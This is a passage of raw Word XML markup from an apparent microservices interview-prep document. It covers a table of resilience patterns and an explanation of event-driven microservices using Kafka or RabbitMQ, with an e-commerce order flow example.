            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="23706D59"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Bulkhead</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2B1FBA1D"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Resilience4j</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7B33A8A6"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Isolate failures</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F25965" w:rsidRPr="00FA65E9" w14:paraId="25F28E80" w14:textId="77777777" w:rsidTr="00F25965">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4B4F90B4"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Rate Limiter</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="466F2674"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Resilience4j</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3122FA8C"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Throttle excessive load</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F25965" w:rsidRPr="00FA65E9" w14:paraId="5770AFA6" w14:textId="77777777" w:rsidTr="00F25965">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="65517C78"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Fallback</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0220FBBD"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Code fallback</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4666239A"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Degrade gracefully</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F25965" w:rsidRPr="00FA65E9" w14:paraId="60D5E08C" w14:textId="77777777" w:rsidTr="00F25965">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="190F68F2"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Timeout</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7F39C621"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HTTP Client config</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6672E55C"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Fail fast on slow services</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F25965" w:rsidRPr="00FA65E9" w14:paraId="683786E9" w14:textId="77777777" w:rsidTr="00F25965">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="08144ACE"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Async Messaging</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0D86828D"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Kafka/RabbitMQ</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7C4B1A29"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Decoupling and resilience</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F25965" w:rsidRPr="00FA65E9" w14:paraId="46B8519C" w14:textId="77777777" w:rsidTr="00F25965">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="353F87C4"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Monitoring</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="61482BFD"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Prometheus, ELK</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="28CC752F"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Detect &amp; act on failures</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6D714BD9" w14:textId="2DF5BE38" w:rsidR="00115965" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00115965">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:pict w14:anchorId="0C262212">
          <v:rect id="_x0000_i2920" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="20F84489" w14:textId="6B61FCCD" w:rsidR="001659D4" w:rsidRPr="00CE4B95" w:rsidRDefault="00AF4871">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="695" w:name="_Toc196308175"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Can you explain Event driven microservice and how you have used it in your project</w:t>
      </w:r>
      <w:r w:rsidR="001659D4" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="695"/>
    </w:p>
    <w:p w14:paraId="5562E1A7" w14:textId="6319DD02" w:rsidR="00F25965" w:rsidRPr="00FA65E9" w:rsidRDefault="00F25965" w:rsidP="00FA65E9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>✅</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Event-Driven Microservices – Explained with Usage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D77ACDE" w14:textId="77777777" w:rsidR="00F25965"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570315C6">
          <v:rect id="_x0000_i2921" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="032F9B64" w14:textId="77777777" w:rsidR="00F25965" w:rsidRPr="00FA65E9" w:rsidRDefault="00F25965" w:rsidP="00FA65E9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>💡</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> What is Event-Driven Microservices?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5468FD87"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 xml:space="preserve">An </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Event-Driven Microservice</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> architecture uses </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>asynchronous communication</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> where services </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>publish and consume events</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> instead of making direct API calls.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AD318B5" w14:textId="77777777" w:rsidR="00F25965"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2C672FE9">
          <v:rect id="_x0000_i2922" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F67C17A" w14:textId="77777777" w:rsidR="00F25965" w:rsidRPr="00FA65E9" w:rsidRDefault="00F25965" w:rsidP="00FA65E9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>🔁</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> How It Works:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A764A78"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Producer Service</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Publishes an event (e.g., OrderCreated, PaymentFailed) to a </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>message broker</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2713E631"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Broker</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Message queue (like </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Apache Kafka</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>RabbitMQ</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AWS SNS/SQS</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>) acts as a middle layer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41729E5F"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onsumer Service(s)</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Subscribes to relevant events and processes them asynchronously.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="653281AB" w14:textId="77777777" w:rsidR="00F25965"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0DA5D577">
          <v:rect id="_x0000_i2923" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DA5712F" w14:textId="77777777" w:rsidR="00F25965" w:rsidRPr="00FA65E9" w:rsidRDefault="00F25965" w:rsidP="00FA65E9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>🧱</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Compon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9"/>
        <w:gridCol w:w="3621"/>
      </w:tblGrid>
      <w:tr w:rsidR="00F25965" w:rsidRPr="00FA65E9" w14:paraId="0D6FC560" w14:textId="77777777" w:rsidTr="00F25965">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2EF3FFC7" w14:textId="77777777" w:rsidR="00F25965" w:rsidRPr="00FA65E9" w:rsidRDefault="00F25965"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Component</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="61A837C1" w14:textId="77777777" w:rsidR="00F25965" w:rsidRPr="00FA65E9" w:rsidRDefault="00F25965" w:rsidP="00FA65E9">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FA65E9">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F25965" w:rsidRPr="00FA65E9" w14:paraId="23CD1C55" w14:textId="77777777" w:rsidTr="00F25965">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="13F3BAAF"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Event</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="084D9801"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A message representing a state change.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F25965" w:rsidRPr="00FA65E9" w14:paraId="550F6930" w14:textId="77777777" w:rsidTr="00F25965">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0EC4A4AD"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Producer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="28EE3261"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Sends (publishes) event messages.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F25965" w:rsidRPr="00FA65E9" w14:paraId="31648BDE" w14:textId="77777777" w:rsidTr="00F25965">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4B4327E2"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lastRenderedPageBreak/>
              <w:t>Broker</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6A5DF3F2"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Middleware (Kafka, RabbitMQ, etc.)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F25965" w:rsidRPr="00FA65E9" w14:paraId="0C88854B" w14:textId="77777777" w:rsidTr="00F25965">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="79568E46"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Consumer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="089D1057"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Receives and processes events.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6C6E3DC0" w14:textId="77777777" w:rsidR="00F25965"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2DFAE536">
          <v:rect id="_x0000_i2924" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C43CEBB" w14:textId="77777777" w:rsidR="00F25965" w:rsidRPr="00FA65E9" w:rsidRDefault="00F25965" w:rsidP="00FA65E9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>👷</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> How I used it in my Project:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="305ED000" w14:textId="77777777" w:rsidR="00F25965" w:rsidRPr="00FA65E9" w:rsidRDefault="00F25965" w:rsidP="00FA65E9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>✅</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Use Case: E-commerce Platform</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="405E5156"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Microservices:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D633910"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Order Service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62911F6F"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Inventory Service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="746FD2A4"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Notification Service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00F0DE4F"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Payment Service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="338D3293" w14:textId="77777777" w:rsidR="00F25965" w:rsidRPr="00FA65E9" w:rsidRDefault="00F25965" w:rsidP="00FA65E9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>🔹</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Flow:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AD9FBE2"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Order Service</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> places an order → Publishes OrderCreated event to Kafka.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27A0E136"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Inventory Service</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
